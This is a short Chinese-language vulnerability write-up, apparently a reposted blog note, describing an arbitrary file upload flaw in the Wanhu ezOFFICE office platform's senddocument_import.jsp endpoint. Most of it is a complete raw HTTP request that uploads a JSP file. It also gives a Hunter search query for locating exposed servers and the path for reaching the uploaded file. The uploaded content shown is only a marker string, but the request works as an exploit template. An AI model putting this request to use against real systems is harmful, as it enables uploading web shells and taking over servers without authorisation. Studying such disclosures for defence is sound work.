登录 白背景
源码

万户协同办公平台senddocument_import存在任意文件上传漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台senddocument_import存在任意文件上传漏洞

<font style="color:rgb(62, 62, 62);">二、影响版本</font>

  • <font style="color:rgb(62, 62, 62);">万户ezoffice</font>

<font style="color:rgb(62, 62, 62);">三、资产测绘</font>

  • <font style="color:rgb(62, 62, 62);">hunter</font><font style="color:rgb(62, 62, 62);">app.name="万户 Ezoffice OA"</font>
  • <font style="color:rgb(62, 62, 62);">登录页面</font>

1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png

<font style="color:rgb(62, 62, 62);">四、漏洞复现</font>

POST /defaultroot/modules/govoffice/gov_documentmanager/senddocument_import.jsp;?categoryId=null&path=loginpage&mode=add&fileName=null&saveName=null&fileMaxSize=0&fileMaxNum=null&fileType=jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 288
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="photo"; filename="stc.jsp"

stc
--00content0boundary00
Content-Disposition: form-data; name="continueUpload"

0
--00content0boundary00
Content-Disposition: form-data; name="submit"

导入
--00content0boundary00--

1700414857287-75e5729f-0a31-48c1-8867-bd14ea937f20.png

上传文件位置,注意最后需添加一个;

/defaultroot/upload/loginpage/2023112001240329341614287.jsp;

1700414922582-83b76fec-742f-485f-9101-0a7518a37d27.png

原文: https://www.yuque.com/xiaokp7/ocvun2/ryl0n11eg3eg5cgu